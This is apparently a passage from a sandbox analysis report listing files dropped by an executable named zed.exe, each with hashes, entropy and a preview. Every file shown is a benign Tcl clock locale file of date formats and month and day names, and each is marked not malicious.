                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoojoOo2e4soe3v6ay/5o27+3v4x6HyFvn:4EnLB38304u3v6ay/k3v4ISVn
                                                                                                                                                                                                                                            MD5:E2E3BD806C20D7FB88109B7F3B84C072
                                                                                                                                                                                                                                            SHA1:2D7AD6BECA9C4D611BAE9747AD55A3E9385C2B42
                                                                                                                                                                                                                                            SHA-256:3A9C22B07906544C04F7A29B800FCE87C09D7FDF5C251236925115CF251A3890
                                                                                                                                                                                                                                            SHA-512:B14756B59BCABF8B29B41AC688E4F3A011735AF190B88F88B7B5FDDD3DA77F63FFC0F7875B3B453729CD3BC65E79F75F6E632CA68952EF473F78337D89E80BF2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_PH AM "AM".. ::msgcat::mcset en_PH PM "PM".. ::msgcat::mcset en_PH DATE_FORMAT "%B %e, %Y".. ::msgcat::mcset en_PH TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset en_PH DATE_TIME_FORMAT "%B %e, %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.911413468674953
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoQW53FuoQGuX3v6ZwoQWa+3v3F0fxvn:4EnLB383V83FOJ3v62c3v3FEn
                                                                                                                                                                                                                                            MD5:F70245D73BE985091459ADF74B089EBC
                                                                                                                                                                                                                                            SHA1:21D52C336C08526D9DCF1AEC1F0701CB8B073D7A
                                                                                                                                                                                                                                            SHA-256:D565679AE9AACBFE3B5273FE29BD46F46FFBB63C837D7925C11356D267F5FF82
                                                                                                                                                                                                                                            SHA-512:171C70EB10D5E6421A55CE9B1AE99763E23FB6A6F563F69FE099D07C07FCA0CF8D3F6F00C5BB38BFF59A5F4C311506C4A9593F86C12B3B9E1861E72656B3800B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_SG DATE_FORMAT "%d %b %Y".. ::msgcat::mcset en_SG TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset en_SG DATE_TIME_FORMAT "%d %b %Y %P %I:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):251
                                                                                                                                                                                                                                            Entropy (8bit):4.937431055623088
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoOr0lIZoOK3v6poOs+3v0l6Uvn:4EnLB383z+3v6R3vl2n
                                                                                                                                                                                                                                            MD5:FCA7B13CA6C9527D396A95BEA94CC92D
                                                                                                                                                                                                                                            SHA1:E6F338A08F72DA11B97F70518D1565E6EF9AD798
                                                                                                                                                                                                                                            SHA-256:67C253E2A187AA814809418E5B7A21F3A1F9FB5073458A59D80290F58C6C1EB4
                                                                                                                                                                                                                                            SHA-512:37B8B4EA24B1C77AF0252A17660650CB2D4F8BB55C75817D6A94E1B81A3DDEF9913D12D3BF80C7BFE524CD0AD84E353E73238056759E6545BFE69EF5F806B8B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_ZA DATE_FORMAT "%Y/%m/%d".. ::msgcat::mcset en_ZA TIME_FORMAT_12 "%I:%M:%S".. ::msgcat::mcset en_ZA DATE_TIME_FORMAT "%Y/%m/%d %I:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.934659260313229
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoEmGMoEs6W3v6ay/5oEmT+3vR6HyFvn:4EnLB383Zr0s6W3v6ay/ZJ3voSVn
                                                                                                                                                                                                                                            MD5:A302091F490344B7A79C9463480AD7CF
                                                                                                                                                                                                                                            SHA1:E3992D665077177BAD5A4771F1BAF52C2AD1829C
                                                                                                                                                                                                                                            SHA-256:6F4754CE29DFA4F0E7957923249151CE8277395D1AF9F102D61B185F85899E4E
                                                                                                                                                                                                                                            SHA-512:FEBDB0BD6D0FD4C592DB781836F93F0C579399D324112F8829B769303CC6EEA487AAB14EBD60ED1B4F3B3DABF501601C9F65656327FF54853BF2CD9EC6A2F00F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_ZW DATE_FORMAT "%d %B %Y".. ::msgcat::mcset en_ZW TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset en_ZW DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1285
                                                                                                                                                                                                                                            Entropy (8bit):4.3537859241297845
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83dRb4vyomrIsmZ55vrAO0LH+50ydAcveva:43PT5rWvrAR60yW6oa
                                                                                                                                                                                                                                            MD5:D87605E6282713EED41D56D53B7A04FD
                                                                                                                                                                                                                                            SHA1:41AAD4BD3B72CCBB6A762FEED3C24931642DD867
                                                                                                                                                                                                                                            SHA-256:98D52CAB5CA65789D1DC37949B65BAF0272AB87BCCBB4D4982C3AF380D5406AB
                                                                                                                                                                                                                                            SHA-512:4A4F51B2FD0248B52530B5D9FE6BFCFE455147CBE2C1F073804A53666945405F89CBBAD219FFF6904C1F92885F7C53B9D9A969732D662CEA8EC1717B3303B294
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset eo DAYS_OF_WEEK_ABBREV [list \.. "di"\.. "lu"\.. "ma"\.. "me"\.. "\u0135a"\.. "ve"\.. "sa"].. ::msgcat::mcset eo DAYS_OF_WEEK_FULL [list \.. "diman\u0109o"\.. "lundo"\.. "mardo"\.. "merkredo"\.. "\u0135a\u016ddo"\.. "vendredo"\.. "sabato"].. ::msgcat::mcset eo MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "a\u016dg"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset eo MONTHS_FULL [list \.. "januaro"\.. "februaro"\.. "marto"\.. "aprilo"\.. "majo"\.. "junio"\.. "julio"\.. "a\u016dgusto"\.. "septembro"\.. "oktobro"\.. "novembro"\.. "decembro"\.. ""].. ::m
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1232
                                                                                                                                                                                                                                            Entropy (8bit):4.2910064237800025
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83hEVIhlp4herIsYoorrClH+Fo9ARhprBvtFvr6:43OVY7+ercrmsYsr1thr6
                                                                                                                                                                                                                                            MD5:91DE6EE8E1A251EF73CC74BFB0216CAC
                                                                                                                                                                                                                                            SHA1:1FB01E3CF2CAFA95CC451BC34AB89DC542BBD7DD
                                                                                                                                                                                                                                            SHA-256:E9A6FE8CCE7C808487DA505176984D02F7D644425934CEDB10B521FE1E796202
                                                                                                                                                                                                                                            SHA-512:46CFD80E68461F165EE6A93AB6B433E4D4DA6A9A76CB7F3EF5766AC67567A7AFFB7B4E950A5AFA7C69C91F72AC82D2A448D32E39BBFC0BF26D2257460471EEC1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es DAYS_OF_WEEK_ABBREV [list \.. "dom"\.. "lun"\.. "mar"\.. "mi\u00e9"\.. "jue"\.. "vie"\.. "s\u00e1b"].. ::msgcat::mcset es DAYS_OF_WEEK_FULL [list \.. "domingo"\.. "lunes"\.. "martes"\.. "mi\u00e9rcoles"\.. "jueves"\.. "viernes"\.. "s\u00e1bado"].. ::msgcat::mcset es MONTHS_ABBREV [list \.. "ene"\.. "feb"\.. "mar"\.. "abr"\.. "may"\.. "jun"\.. "jul"\.. "ago"\.. "sep"\.. "oct"\.. "nov"\.. "dic"\.. ""].. ::msgcat::mcset es MONTHS_FULL [list \.. "enero"\.. "febrero"\.. "marzo"\.. "abril"\.. "mayo"\.. "junio"\.. "julio"\.. "agosto"\.. "septiembre"\.. "octubre"\.. "noviembre"\.. "diciembre"\.. ""].. ::msgc
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):248
                                                                                                                                                                                                                                            Entropy (8bit):4.878377455979812
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xo8GzvFjot/W3v1o8T+3v9ysvn:4EnLB3833GzdV3vLK3vnn
                                                                                                                                                                                                                                            MD5:313966A7E4F50BB77996FDE45E342CA9
                                                                                                                                                                                                                                            SHA1:021DF7211DAE9A635D52F7005672C157DBBAE182
                                                                                                                                                                                                                                            SHA-256:B97DCEA4FEC3E14632B1511D8C4F9E5A157D97B4EBBC7C6EE100C3558CB2947F
                                                                                                                                                                                                                                            SHA-512:79DCC76263310523BAF1100C70918FCE6BECB47BE360E4A26F11C61F27E14FC28B588A9253AA0C1F08F45AE8A03312A30FBDCF4FDFFDC5BF9D086C4B539DE022
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_AR DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_AR TIME_FORMAT "%H:%M:%S".. ::msgcat::mcset es_AR DATE_TIME_FORMAT "%d/%m/%Y %H:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.924579610789789
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoYePWWjoU3v6ry/5oY7+3vPUe6HyFvn:4EnLB383nedh3v6ry/nS3vs3SVn
                                                                                                                                                                                                                                            MD5:EF58B1097A3C6F2133BD7AA8CCC1AD1B
                                                                                                                                                                                                                                            SHA1:BD479E4635F3CD70A6A90E07B7E92757BC9E2687
                                                                                                                                                                                                                                            SHA-256:B47F55539DB6F64304DEA080D6F9A39165F1B9D4704DCBA4C182DBD3AA31A11B
                                                                                                                                                                                                                                            SHA-512:F9EB1489E5002200D255A45DC57132DEFD2A2C6DE5BC049D0D9720575E4FDD1B6A212D9E15974C6A2E0D0886069EA0DD967AD7C20845EC38EB74CBED0C3E5BE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_BO DATE_FORMAT "%d-%m-%Y".. ::msgcat::mcset es_BO TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_BO DATE_TIME_FORMAT "%d-%m-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.9352990174129925
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xodvPWWjok3v6ry/5odo+3vPUe6HyFvn:4EnLB383OdV3v6ry/i3vs3SVn
                                                                                                                                                                                                                                            MD5:42BCE0EE3A3F9E9782E5DE72C989903A
                                                                                                                                                                                                                                            SHA1:0960646417A61E8C31D408AE00B36A1284D0300E
                                                                                                                                                                                                                                            SHA-256:9D1A2A6EBA673C6F6D964DBCDDF228CB64978F282E70E494B60D74E16A1DB9CB
                                                                                                                                                                                                                                            SHA-512:C53DDCC17F261CFFAA2205879A131CFD23A7BCF4D3787090A0EA8D18530C4805903ED6CF31B53A34C70510A314EBBB68676E9F128289B42C5EFBC701405D5645
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_CL DATE_FORMAT "%d-%m-%Y".. ::msgcat::mcset es_CL TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_CL DATE_TIME_FORMAT "%d-%m-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.908553844782894
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xo4FjbmvFjo4F+3v6ry/5o4++3vjb0f6HyFvn:4EnLB3831mdD+3v6ry/P3vbSVn
                                                                                                                                                                                                                                            MD5:6A8F31AE734DCEE4845454408CDB3BC5
                                                                                                                                                                                                                                            SHA1:A3B9A0124D3CFA9E0E5957612897B23193AD5D59
                                                                                                                                                                                                                                            SHA-256:5FAC53ACFB305C055AFD0BA824742A78CB506046B26DAC21C73F0BB60C2B889A
                                                                                                                                                                                                                                            SHA-512:188A65CFE2FBD04D83F363AEA166F224137C8A7009A9EBEB24B2A9AC89D9484D3A7109A4CE08F5C0A28911D81571230CC37554F4F19956AE163F9304911EE53C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_CO DATE_FORMAT "%e/%m/%Y".. ::msgcat::mcset es_CO TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_CO DATE_TIME_FORMAT "%e/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.919346233482604
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xo76GzvFjoTW3v6ry/5o76T+3v9f6HyFvn:4EnLB383K6Gzdj3v6ry/K6K3vMSVn
                                                                                                                                                                                                                                            MD5:2EDDA3F61BA4D049E6C871D88322CF72
                                                                                                                                                                                                                                            SHA1:40AFB64AF810596FCBDBD742ACAFE25CE56F3949
                                                                                                                                                                                                                                            SHA-256:A33DC22330D087B8567670B4915C334FF1741EE03F05D616CC801ECFDA1D9E64
                                                                                                                                                                                                                                            SHA-512:B6A6059B44F064C5CB59A3DAFAA7BE9064EE3E38F5FA6391017D931EF3A2B471DC4D556B7BEC6852FD1F6260EF17F476754D6BEA89E035748E9304977513CFB5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_CR DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_CR TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_CR DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.913083040975068
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xomerQZ2jou3v6ry/5om7+3vrQZg6HyFvn:4EnLB383sk4/3v6ry/s3vkrSVn
                                                                                                                                                                                                                                            MD5:76CFD4F568EA799F9A4082865633FF97
                                                                                                                                                                                                                                            SHA1:B09846BBF7A78243A5075F2DC9241791DCBA434B
                                                                                                                                                                                                                                            SHA-256:8DC2F857E91912ED46A94EB6B37DD6170EA7BCDDCD41CB85C0926A74EE12FCC1
                                                                                                                                                                                                                                            SHA-512:58B20A8A5D1F8C19AC36E61965106266B7E6F7E95DDD6AD9C4BB9FD7FFC561CB0E2103639D901A6A78CE2DD154CBF7F3AE0F71B4DC1CCB11DC6BB40D9C6E2157
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_DO DATE_FORMAT "%m/%d/%Y".. ::msgcat::mcset es_DO TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_DO DATE_TIME_FORMAT "%m/%d/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.915857529388286
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xozgzvFjoro+3v6ry/5oz9+3v9f6HyFvn:4EnLB383OgzdkF3v6ry/OI3vMSVn
                                                                                                                                                                                                                                            MD5:94B713B1560FE7711EA746F1CEBD37CD
                                                                                                                                                                                                                                            SHA1:E7047E8F04D731D38FA328FBC0E1856C4A8BB23D
                                                                                                                                                                                                                                            SHA-256:52AB5A6C9DD4F130A75C049B3AF8F54B84071FC190374BCCF5FA0E1F3B91EB21
                                                                                                                                                                                                                                            SHA-512:EE807D4D74A609F642CC3C6FC3D736708F67A6931DEB95288AB5822DA256BE4C908A346036195CF4266408458906D28BB5C715EEAFCACFC4FE45D4E6D8E435FE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_EC DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_EC TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_EC DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.9102355704853435
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xohvjbmvFjoI3v6ry/5oho+3vjb0f6HyFvn:4EnLB383KmdJ3v6ry/W3vbSVn
                                                                                                                                                                                                                                            MD5:761D0A468DF2EE75BC2CAB09D5FF38CD
                                                                                                                                                                                                                                            SHA1:D627BE45FE71CCB3CA53153393C075FF5136C2F3
                                                                                                                                                                                                                                            SHA-256:19B4D3025156C060A16328370A3FDB9F141298DECFC8F97BE606F6438FECE2EE
                                                                                                                                                                                                                                            SHA-512:6CF7C9004A8A3B70495862B7D21921B1A6263C2153FEBC5C4997366498ABBFE70263B436C2B4998550780A4C3A58DCF0AAE7420FF9D414323D731FA44BD83104
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_GT DATE_FORMAT "%e/%m/%Y".. ::msgcat::mcset es_GT TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_GT DATE_TIME_FORMAT "%e/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.947925914291734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoIvriSFjoP3v6ry/5oIo+3vrig6HyFvn:4EnLB383V+2m3v6ry/v3v+lSVn
                                                                                                                                                                                                                                            MD5:33CEE7F947A484B076F5FA7871A30FEB
                                                                                                                                                                                                                                            SHA1:F77F8D1F42008770A6FF1F5097C863ECF482BEBE
                                                                                                                                                                                                                                            SHA-256:07873D4D59BB41000706A844859C73D26B1FF794058AA83CFFCA804981A24038
                                                                                                                                                                                                                                            SHA-512:EBF6873F9CB554489EFCD352943100C00171E49D27153769D1C4DB25E2D1F44F2D34869B596C267C9BB59ED0444468D9982137CFB1C6035FB15A855BB867133B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_HN DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_HN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_HN DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.9102355704853435
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoPjbmvFjoH+3v6ry/5oI+3vjb0f6HyFvn:4EnLB383UmdD3v6ry/k3vbSVn
                                                                                                                                                                                                                                            MD5:678D7A6DC32355246BF3AC485A24AF4D
                                                                                                                                                                                                                                            SHA1:B6C273D3BE5FB9F5A221B0333870CCE41CEDFDE4
                                                                                                                                                                                                                                            SHA-256:A0F57137D2C0ABDC933E03CFB188F5632176C195CEADB9DC80D469C8DC6CEDC6
                                                                                                                                                                                                                                            SHA-512:571404CCB0591C681C975E3F7A6C6972FAF2362F1D48BFC95E69A9EAE2DB3F40BF4B666C41950C4924E3FD820C61ED91204F92283B8554F1BD35B64D53BD4125
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_MX DATE_FORMAT "%e/%m/%Y".. ::msgcat::mcset es_MX TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_MX DATE_TIME_FORMAT "%e/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.918215906418583
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoe/GriSFjo3W3v6ry/5oe/T+3vrig6HyFvn:4EnLB383Re+2eW3v6ry/RS3v+lSVn
                                                                                                                                                                                                                                            MD5:471C41907CE5DB1F30C647A789870F78
                                                                                                                                                                                                                                            SHA1:C575A639609620AF7C56430991D0E4C2B50BDEC5
                                                                                                                                                                                                                                            SHA-256:6250663DA1378E54BEDCEF206583D212BC0D61D04D070495238D33715BB20CAE
                                                                                                                                                                                                                                            SHA-512:CAE32DF8F583542CAFE3292501725D85B697A5C1F9A0A7993490E8A69B6CE5CE3DE3AA2733B14D989A8D13B5E31B437DB42E9AB9D1851FE72313592C752B5061
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_NI DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_NI TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_NI DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.906719336603863
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoX5rQZ2joHE3v6ry/5oXa+3vrQZg6HyFvn:4EnLB383ak4F3v6ry/G3vkrSVn
                                                                                                                                                                                                                                            MD5:571F6716293442672521F70854A5AD05
                                                                                                                                                                                                                                            SHA1:525EBDEA6F85FC769B6C0C0B179BD98381647123
                                                                                                                                                                                                                                            SHA-256:EBB661C1C09E7D4F6FBCC4B2DAD0F41442B1FFDD27F003ABDC0375DD316E57D7
                                                                                                                                                                                                                                            SHA-512:C6176EE48515BDFC09B8347DAC5FD2C0165AA765916457DC7B057E526785AC912481CB72F118D2943372213B23CE3C39739263C2B3DA4DBFEB24C522ACC0439D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PA DATE_FORMAT "%m/%d/%Y".. ::msgcat::mcset es_PA TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PA DATE_TIME_FORMAT "%m/%d/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.90959433688075
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoIgzvFjoQ9X3v6ry/5oI9+3v9f6HyFvn:4EnLB383+zdB3v6ry/y3vMSVn
                                                                                                                                                                                                                                            MD5:5A5997D834DDD3E2E8FF8C6956AD54AC
                                                                                                                                                                                                                                            SHA1:AB4110E37B3665D738A8F2B3E64CBA9E99127301
                                                                                                                                                                                                                                            SHA-256:90C130B66958CF63CB3DDD2C633E58444357DBAB44C56831DD794CBD2EB1AED0
                                                                                                                                                                                                                                            SHA-512:1FEB8E77EA7B886E4A06279AC8A4B6200DBB86DCD28989651B92A0C9147A7BCFBB871DF8F904A1CF8F869BFFBD21325505AC44A4DBEBE1EFC87D43174597F1F3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PE DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_PE TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PE DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.905689521403511
                                                                                                                                                                                                                                            Encrypted:false
